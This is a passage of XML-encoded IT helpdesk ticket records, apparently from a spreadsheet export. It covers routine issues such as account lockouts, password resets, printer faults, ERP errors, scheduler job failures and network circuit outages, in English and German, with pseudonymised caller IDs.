    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear team,_x000a_pls. help to check return delivery#9169142692ï½ž_x000a_it's required to enter batch but we can not key in anything in the blank_x000a_[cid:image001.png@01d1ffa6.a718f620]_x000a__x000a_[cid:image002.png@01d1ffa7.0ff104d0]_x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="17"/>
  </r>
  <r>
    <s v="laptop doesn't access with network "/>
    <s v="laptop doesn't access with network "/>
    <s v="zjwecphr swhkzyfq"/>
    <x v="31"/>
  </r>
  <r>
    <s v="vpn login issue : account lock out "/>
    <s v="vpn login issue : account lock out"/>
    <s v="vfoyenlw ntpbdeyf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation : company provided "/>
    <s v="mobile device activation : company provided "/>
    <s v="ckwfvyda saunmgqt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sql error 2048 in SID_1 erp system"/>
    <s v="there are are more than 15+ dumps in st22 with sql error 2048 "/>
    <s v="vradzimk xvmcoskl"/>
    <x v="13"/>
  </r>
  <r>
    <s v="cartridge id02"/>
    <s v="printer cartridge replacement on the printer "/>
    <s v="ipqgrnxk acxedqjm"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ie not launching "/>
    <s v="ie not launching _x000d__x000a__x000d__x000a_tried opening in safe mode, no go_x000d__x000a_reset , no go_x000d__x000a_tried disabling ie windows features, failed to disable._x000d__x000a_reboot system._x000d__x000a_it worked fine._x000d__x000a_ "/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ad account lock out and password reset through password_management_tool password manager."/>
    <s v="ad account lock out and password reset through password_management_tool password manager."/>
    <s v="hotwlygp afukzhnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delete of history/ cache in seocompanyxv syxewkji &lt;seocompanyxv.syxewkji@gmail.com&gt; for ess uacyltoe hxgayczeing"/>
    <s v="delete of history/ cache in seocompanyxv syxewkji &lt;seocompanyxv.syxewkji@gmail.com&gt; for ess uacyltoe hxgayczeing_x000d__x000a__x000d__x000a_"/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="18"/>
  </r>
  <r>
    <s v="defekt kopierer k 13"/>
    <s v="kopierer ausbildungswerkstatt k 13 defekt. fehlermeldung: einzug fehlerhaft servicedienst notwendig"/>
    <s v="tgpvrbyi ztdxwpcn"/>
    <x v="41"/>
  </r>
  <r>
    <s v="ad account locked out "/>
    <s v="ad account locked out _x000a_:520056771751_x000a_summary:i am locked out of my computer._x000a_"/>
    <s v="isbczxtu gvxureqa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype issue : unable to make or receive calls in skype"/>
    <s v="unable to make or receive calls in skype. most of the times the warehouse_tool thru hehr_toolhones is not audible but can be heard thru speake"/>
    <s v="aiprzulo lzvmgqwy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="r101 drucker defekt"/>
    <s v="r101 drucker defekt"/>
    <s v="mhvbnqri sacvgzxf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/26/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="in the inbox always show there are several emails which has not been read , but i had already "/>
    <s v="+86  "/>
    <s v="mqbxwpfn uclrqfxa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job failed : ( there is no datasource with these attributes ) please check attachment"/>
    <s v="job failed : ( there is no datasource with these attributes )  please check attachment"/>
    <s v="cubdsrml znewqgop"/>
    <x v="20"/>
  </r>
  <r>
    <s v="account lock out issue "/>
    <s v="account lock out issue "/>
    <s v="hzetqwba tmsbnfkh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="general query about rdp : "/>
    <s v="44_x000a_user wanted to report about some one working on his system without his awareness._x000a_checked with changes happened in computer, it was erp went back to default settings._x000a_checked in programdntys and features , it was erp patch installed during that time._x000a_appreciated user and asked to inform if he sees this activity again."/>
    <s v="rxyopuha svfqmncl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="could not setup notification list in dvw system: warning ora-02291."/>
    <s v="user name: yinnrty_x000a_user id: 11333657100_x000a_system: dvw_x000a_contact phone: _x000a_error message:ora-02291: integrity constraint (gdwowner.fk_sbscrptn_tblusers) violated - parent key not found _x000a_----------------------------------------_x000a_production specifications:Â _x000a_application serverÂ :lhqSID_1854_x000a_database serverÂ / name:oracle gdwp_x000a__x000a_"/>
    <s v="cysbkonu mzutvwir"/>
    <x v="25"/>
  </r>
  <r>
    <s v="account lock out issue "/>
    <s v="account lock out issue _x000d__x000a_remote into user computer and removed all old password._x000d__x000a_cleared temp and prefetch file._x000d__x000a_signed in to outlook and checked with skype._x000d__x000a_ran lock out status and informed user to update password in all mobile device._x000d__x000a__x000d__x000a_"/>
    <s v="ihlguasz agnwcqiz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/25/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ksem / m36 / ewkw8113117 / rechner startet nicht"/>
    <s v="bios einstellen, das rechner bei netz-reset selbststÃ¤ndig startet._x000d__x000a_bitte um erledigung durch m. himghtmelreich"/>
    <s v="zxopwyak zrbfkimx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="unable to print from erp"/>
    <s v="unable to print from erp"/>
    <s v="bkyphsgq cfyksehu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: india telecom_vendor_1 40 &amp; 20 mbps circuits are down at 4:33 pm et on 08/25. site is up on telecom_vendor_3 circuit ."/>
    <s v="what type of outage:  _____network     __x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______4:33 pm et on 08/25________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ?    no    yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_4.  scheduled maintenance ( network) ? __no_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na____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _______na____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _______na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job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/25/2016 16:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="network outage : usa warehouse, vpn circuit is down at 3:16 pm et on 08/25. site is up on primary."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______3:16 pm et on 08/25._______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no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3"/>
  </r>
  <r>
    <s v="unable to connect to the printers dv07 and dv28. also need help to connect scanner"/>
    <s v="unable to connect to the printers dv07 and dv28. i also need help with the scanner, i tried to download the driver from the fujitsu website but when i tried to run it i need to have administrator access???"/>
    <s v="eocvkuxw eqfsphnd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="latpop will not startup without ac power cord connected so suspect a bad battery?"/>
    <s v="latpop will not startup without ac power cord connected so suspect a bad battery?"/>
    <s v="kaguhxwo uoyipxqg"/>
    <x v="2"/>
  </r>
  <r>
    <s v="circuit outage: usa , vpn circuit is down at 2:42 pm et on 08/25. circuit is up on primary."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    __slo site_______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________2:42 pm et on 08/25____________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ___yes___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __yes___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unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="jfgepoay qsbjaemc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="ebxrlknc txnvwupy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="intermittent internet connection"/>
    <s v="intermittent internet connection"/>
    <s v="qscdktvl rihendxu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery notes from other users coming to the printer"/>
    <s v="delivery notes from other users coming to the printer"/>
    <s v="rtpmlwnk unpambrv"/>
    <x v="17"/>
  </r>
  <r>
    <s v="system slow on start up "/>
    <s v="system slow on start up "/>
    <s v="yhzdtkla ncobgtdm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="check router wifi - site: south_amerirtca - sp - sÃ£o bernardo campo (mercedes benz)"/>
    <s v="hi team, please check the router wifi the site company -south_amerirtca - sÃ£o pollaurido / sÃ£o bernardo campo. no is possible connect network wifi - companysecure, this network no is visible to users local. if you need connect remotely or has more doubts please, return me.. "/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="3"/>
  </r>
  <r>
    <s v="usa print"/>
    <s v="usa print issue"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="14"/>
  </r>
  <r>
    <s v="sign-on is not working"/>
    <s v="name:mikhghytr karaffa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vfrdxtqw.jfbmsenz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hello, my single sign-on is not working"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pc probleme urgent"/>
    <s v="_x000a__x000a_received from: eluvxqhw.gpbfkqeu@gmail.com_x000a__x000a_hallo ,_x000a__x000a_folgende funktionen und programdntyme laufen nicht mehr._x000a__x000a__x000a_Â·       weekly report lÃ¤ÃŸt sich nicht Ã¼bertragen, meldet falscher serverpfad._x000a__x000a__x000a_Â·       collaboration_platform findet die biblotheken nicht mehr._x000a__x000a__x000a_Â·       keine synchronisation mit collaboration_platform mehr._x000a__x000a__x000a_Â·       lte verbindung nicht mÃ¶glich._x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a__x000a_eluvxqhw gpbfkqeu_x000a_anwendungstechnik/ application engineer_x000a_transportation central europe_x000a__x000a_e-mail: eluvxqhw.gpbfkqeu@gmail.com&lt;mailto:eluvxqhw.gpbfkqeu@gmail.com&gt;_x000a__x000a_company deutschland gmbh www.company.com&lt;_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx , naruedlk mpvhakdq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eluvxqhw gpbfkqeu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load engineering tool"/>
    <s v="unable to load engineering tool"/>
    <s v="yhzdtkla ncobgtdm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath installation"/>
    <s v="infopath installation"/>
    <s v="lxmpfiez katjygbp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="half the icons on my desktop are gone after a reboot and updates were applied"/>
    <s v="half the icons on my desktop are gone after a reboot and updates were applied"/>
    <s v="hitakmbs fvhmkntq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to get on skype audio meeting with outside vendors"/>
    <s v="unable to get on skype audio meeting with outside vendors"/>
    <s v="ejvkzobl yijgokrn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa oh operators are locked out of mii and not able to scan in production and capture value add "/>
    <s v="usa oh operators are locked out of mii and not able to scan in production _x000a__x000a_1) tortm hortl (howthrelte) - happened twice in one week_x000a_2) dmitazhw kxbifzoh _x000a__x000a__x000a_"/>
    <s v="epivntxc fdrxmuga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="fjtrnslb ejzkrchq // account has expired"/>
    <s v="fjtrnslb ejzkrchq // account has expired"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="users in chicago wants to update bank details "/>
    <s v="users in chicago wants to update bank details "/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bios update"/>
    <s v="bios update"/>
    <s v="jvshydix rzpmnylt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am stuck.     has 3 lines.   lines 40 and 50 have been inwarehouse_toold 0158401519.   line 60 we cannot pgi"/>
    <s v="i am stuck.    9168335496 has 3 lines.   lines 40 and 50 have been inwarehouse_toold 0158401519.   line 60 we cannot pgi, so it has not inwarehouse_toold.  any ideas on how we can get line 60 inwarehouse_toold?_x000d__x000a__x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a_v  _x000d__x000a_"/>
    <s v="avkotjzx hmntobws"/>
    <x v="12"/>
  </r>
  <r>
    <s v="device type changes for usa"/>
    <s v="device type changes for usa"/>
    <s v="kgytujhe bonhwzrx"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ticket update on inplant_853729"/>
    <s v="ticket update on inplant_853729"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_853833"/>
    <s v="ticket update on inplant_853833"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="device not running dell ml6000 tape library!"/>
    <s v="device not running dell ml6000 tape library !_x000d__x000a__x000d__x000a_backup device not running. error say &quot;open door&quot; !!!!_x000d__x000a__x000d__x000a_"/>
    <s v="yevirgnl ylhogjct"/>
    <x v="11"/>
  </r>
  <r>
    <s v="license inquiry about k1 license"/>
    <s v="license inquiry about k1 license"/>
    <s v="zkhmvnib sugzyvhp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="adobe reader on my pc suddenly will not work, immediate crash &quot;adobe has stopped working&quot;"/>
    <s v="adobe reader on my pc suddenly will not work, immediate crash &quot;adobe has stopped working&quot;"/>
    <s v="pzrskcon pobsajnx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="need access to znqcljxt azvoespk's emails"/>
    <s v="need access to znqcljxt azvoespk's emails"/>
    <s v="csotmdiw yfeqcbti"/>
    <x v="26"/>
  </r>
  <r>
    <s v="outlook is not responding. error : need password."/>
    <s v="outlook is not responding. error : need password."/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="connections problems with microsoft collaboration_platform and my company account"/>
    <s v="connections problems with microsoft collaboration_platform and my company account"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update "/>
    <s v="name:erirtc_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:ntsowaem.jfgslyde@gmail.com_x000a_customer number:_x000a_telephone:7_x000a_summary:following up on ctc t-code application  incident - ticket_no1539328.  can we please get the folks access aerp?"/>
    <s v="ntsowaem jfgslyde"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wireless guest access"/>
    <s v="cti ( network â€“wireless-guest )_x000a__x000a_guest first name: jeffrghryey_x000a_guest last name: adrhtykins_x000a_guest email-id : jadrhtykins@salesforce.com_x000a_contact no - 412_x000a_location: _x000a_company sponsor email-id: vbmzgsdk.jdmyazti@gmail.com_x000a_duration (duration for guest access) : today until 3 pm est"/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked"/>
    <s v="account locked"/>
    <s v="ydigzqbu xdgjizek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="intermittent shutdown on this computer"/>
    <s v="intermittent shutdown on this computer"/>
    <s v="xioapjvd yiqubxmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inwarehouse_tools 0581144512 and 0581149834 issued for ic5268. should be ic5252."/>
    <s v="inwarehouse_tools 0581144512 and 0581149834 issued for ic5268. should be ic5252._x000d__x000a_"/>
    <s v="ipwjorsc uboapexr"/>
    <x v="12"/>
  </r>
  <r>
    <s v="cannot make or recieve calls on iphone 5."/>
    <s v="cannot make or recieve calls on iphone 5."/>
    <s v="okubexia viungdpw"/>
    <x v="63"/>
  </r>
  <r>
    <s v="user needs this account as mentioned in the screenshot to be an active account so that he can add a new opportstorage_product."/>
    <s v="got a call transferred from vitalyst // user needs this account as mentioned in the screenshot to be an active account so that he can add a new opportstorage_product."/>
    <s v="fjciqgav ybkqvazh"/>
    <x v="39"/>
  </r>
  <r>
    <s v="new laptop set-up"/>
    <s v="set up and new laptop and remove the old one"/>
    <s v="chkmejsn lvidgknc"/>
    <x v="2"/>
  </r>
  <r>
    <s v="project collaboration_platform site is no longer creating a project id when a new project is added."/>
    <s v="project collaboration_platform site is no longer creating a project id when a new project is added._x000d__x000a__x000d__x000a__x000d__x000a_examples:_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="erckhtzj tdmkgoie"/>
    <x v="15"/>
  </r>
  <r>
    <s v="blank call with noise"/>
    <s v="blank call with noise"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i have created 2 new material numbers but when i try to build the bom or put it in a bom it says material does not exist"/>
    <s v="mm#'s 7390081 and 6290061"/>
    <s v="xplwmiyr pifoldxr"/>
    <x v="29"/>
  </r>
  <r>
    <s v="cannot access email"/>
    <s v="same incident as the past two days, cannot access to email or km collaboration_platform, it fixed the issue but it is occurring again"/>
    <s v="rqnxlkce nvrzduyk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please display monthly information on the sales approve screen in the compensation programdnty"/>
    <s v="please display monthly information on the sales approve screen in the compensation programdnty. since the performance % calculation was changed to a monthly calculation, the screen has become a little confusing."/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="engineering tool"/>
    <s v="from: aghynil dirttwan [mailto:toolperfect@gmail.com] _x000a_sent: thursday, august 25, 2016 11:08 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: sabrthy engineering tool._x000a__x000a_respected sir/madam,_x000a_please guidge me how to install engineering tool.we have tried on web,but its not done download._x000a_please reply._x000a__x000a__x000a_-- _x000a_mr. aghynil dirttwan_x000a__x000a_perfect sales &amp; services_x000a_g-28, mohgrtyan arcade,_x000a__x000a_"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="created rqfhiong zkwfqagb 7301102 yesterday afternoon.  it does not exist in erp but the ansi iso says it already exists"/>
    <s v="when i try to re-create with ansi iso tbbuyhexstandoff18mm erp says it already exists._x000d__x000a__x000d__x000a_ _x000d__x000a_"/>
    <s v="ivkhegjw gquflzse"/>
    <x v="13"/>
  </r>
  <r>
    <s v="query : who is the owner of  shared mailbox : k-mws-distributor-discounts"/>
    <s v="query : who is the owner of  shared mailbox : k-mws-distributor-discounts"/>
    <s v="rmegscqu juksmtho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="hwbjnpmg nzrbmojg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bitte ewew8323718 konto wieder aktivieren"/>
    <s v="bitte ewew8323718 konto wieder aktivieren"/>
    <s v="xmlbfjpg yegzbvru"/>
    <x v="24"/>
  </r>
  <r>
    <s v="engineering tool password reset."/>
    <s v="engineering tool password reset."/>
    <s v="dxfbqwyg cyzfmrpq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to change the password from password_management_tool"/>
    <s v="unable to change the password from password_management_tool"/>
    <s v="fniphjkr tlxygdeh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to email, erp and collaboration_platform"/>
    <s v="unable to log in to email, erp and collaboration_platform"/>
    <s v="afbcmwsu tjgciswl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telefon asxpnlgk mnktdsjq (durchwahl 174) defekt."/>
    <s v="display kaum noch lesbar. verbindung bei telefonaten wird mittendrin unterbrochen."/>
    <s v="tohxswej pmnlxyrv"/>
    <x v="41"/>
  </r>
  <r>
    <s v="outlook access"/>
    <s v="outlook will not connect when working from home office. "/>
    <s v="ymorvuwg pejkzvfl"/>
    <x v="27"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="unable to submit a discount form from collaboration_platform"/>
    <s v="unable to submit a discount form from collaboration_platform"/>
    <s v="tqemuawj mvcqrbaz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/25/2016 08:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="wrong calculation in erp"/>
    <s v="the rebate was not calculated correctly in the inwarehouse_tools 0158493708 + 0158484133._x000d__x000a_it was too little rebate."/>
    <s v="vrmdtcal agythfow"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2668 failed in job_scheduler at: 08/25/2016 08:06:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="please reset my password for hr_tool globalview SID_67"/>
    <s v="please reset my password for hr_tool globalview SID_67"/>
    <s v="qpkbiwzl urypnjvq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need help to reset password."/>
    <s v="need help to reset password."/>
    <s v="gwptzvxm rhozsfty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you help me reset password for microsoft lync please"/>
    <s v="can you help me reset password for microsoft lync please"/>
    <s v="zvwrklfa pguesbno"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the detail of earnings batch job is not sending the most current payroll info.   "/>
    <s v="i keep getting zearn report for 6/06/16 -6/19/19._x000d__x000a_e-mail title fw: job hr446, step 1_x000d__x000a_how do i get the correct report.  "/>
    <s v="cjqdksbn ysqxpovz"/>
    <x v="51"/>
  </r>
  <r>
    <s v="printer change from fd37 to fd34 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: repyzajo.lxfwopyq@gmail.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_as instructed by ecwtrjnq jpecxuty, please change permanently all default printing jobs/outputs on the erp printer fd37 to the printer fd34._x000d__x000a_also, please repeat all jobs sent to the printer fd37 between friday, august 19th until now on the new printer fd34._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="repyzajo lxfwopyq"/>
    <x v="4"/>
  </r>
  <r>
    <s v="urgent - registration of infopath 2013"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kuznvase.jrxtbuqz@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_please urgently advise how to proceed with this._x000d__x000a_i am asked to review price discounts obviously managed by this ms tool:_x000d__x000a__x000d__x000a_[cid:image001.png@01d1fed1.faf73520]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="kuznvase jrxtbuqz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to hub"/>
    <s v="unable to connect to hub"/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access (s:\globalace_holemaking\ha646)"/>
    <s v="please se my comments in red._x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe / best "/>
    <s v="dxgyefir rczsatqu"/>
    <x v="33"/>
  </r>
  <r>
    <s v="blocked web pages"/>
    <s v="_x000d__x000a__x000d__x000a_received from: iygsxftl.hysrbgad@gmail.com_x000d__x000a__x000d__x000a_dear all,_x000d__x000a__x000d__x000a_please unblock web pages which i do urgently need to access for my technical research._x000d__x000a__x000d__x000a_e.g.:_x000d__x000a_[cid:image001.png@01d1fec2.852ceec0]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="iygsxftl hysrbgad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cisco access point is not working."/>
    <s v="cisco access point is not working._x000d__x000a_mac address : 1819db8e64"/>
    <s v="yevirgnl ylhogjct"/>
    <x v="3"/>
  </r>
  <r>
    <s v="profile setup for new joiner"/>
    <s v="laptop and profile setup for new joiner nikitha upadhyaya/lqnoifve wvhelqxu "/>
    <s v="nawkpdtx gwcvmbhn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="need erp access to /n/dscsag/conv_rule"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1 &amp; SID_34_x000a__x000a_enter user id of user having the issue: gthydanp_x000a__x000a_transaction code(s) the user needs or was working with: /n/dscsag/conv_rule_x000a__x000a_describe the issue: need access to the t- code _x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket.  attached_x000a__x000a_provide access the same as this other user :phillpd"/>
    <s v="svdefgwl sgtmurfh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="probleme mit erpgui \vsdtxwry ngkcdjye"/>
    <s v="probleme mit erpgui \vsdtxwry ngkcdjye"/>
    <s v="vsdtxwry ngkcdjye"/>
    <x v="24"/>
  </r>
  <r>
    <s v="die suchfunktion des skype verzeichnisses funktioniert immer noch nicht."/>
    <s v="die suchfunktion des skype verzeichnisses funktioniert immer noch nicht."/>
    <s v="oefitbmy gcubyszd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="akku def. openstage sl4 bitte neuen besorgen - phone replacement (siemens)"/>
    <s v="akku def. openstage sl4 bitte neuen besorgen"/>
    <s v="fasirxzo xlvnhptm"/>
    <x v="32"/>
  </r>
  <r>
    <s v="pls. check user:yubtgy1 account"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear team,_x000a_pls. help to check below user's account, which account has been locked for several times~ thx a lot!_x000a_user: yubtgy1_x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit weekly report und engineering_tool angebotserstellung"/>
    <s v="_x000a__x000a_received from: rkyjnbqh.kfshormi@gmail.com_x000a__x000a_hallo zusammen,_x000a__x000a_bitte um hilfe mit weekly report und engineering_tool angebotserstellung._x000a__x000a_bin heute bis 12uhr telefonisch erreichbar._x000a__x000a_vielen dank,_x000a_gruÃŸ_x000a__x000a__x000a__x000a_[cid:image001.png@01d1febc.4451e6e0][cid:image003.jpg@01d1febc.9d05ba00]_x000a__x000a_rkyjnbqh kfshormi_x000a_b. eng._x000a_anwendungstechnik i application engineer_x000a_rkyjnbqh.kfshormi@gmail.com_x000a__x000a_company deutschland gmbh_x000a_geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq_x000a_"/>
